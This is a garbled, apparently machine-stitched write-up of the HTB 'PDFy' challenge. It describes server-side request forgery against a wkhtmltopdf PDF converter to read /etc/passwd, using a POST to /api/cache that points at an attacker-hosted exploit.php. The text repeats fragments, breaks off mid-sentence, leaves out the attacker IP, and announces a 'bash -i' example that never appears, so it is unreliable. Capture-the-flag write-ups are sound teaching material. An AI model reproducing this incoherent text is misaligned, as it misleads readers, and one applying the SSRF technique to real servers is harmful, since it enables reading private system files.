You might see:
The core vulnerability is that the server fetches external content without proper validation, leading to .
Identifying within document generation systems. pdfy htb writeup upd
Always validate and sanitize user-provided URLs. Blacklisting "localhost" or "file://" is rarely sufficient, as redirects can often bypass these filters.
Go back to the PDFy web interface. In the input box, enter the URL of your malicious script: You might see: The core vulnerability is that
Now, go back to the PDFy web interface and enter your IP: http:// :8000/exploit.php
A common vulnerability in these converters is the ability to read local files or execute commands. We attempt to read the /etc/passwd file by inputting the following into the URL/Text field: Use code with caution. We attempt to read the /etc/passwd file by
The PDFy challenge is an excellent introduction to SSRF attacks and the risks associated with wkhtmltopdf . By exploiting , we were able to force the PDF converter to leak the server’s /etc/passwd file and retrieve the flag. Whether you use a direct HTML <iframe> or a PHP header redirect, the core concept remains the same – abuse the tool’s ability to follow embedded or redirected URLs to access local resources.
Example using bash -i :
POST /api/cache HTTP/1.1 Host: Content-Type: application/json "url": "http:// :8080/exploit.php" Use code with caution.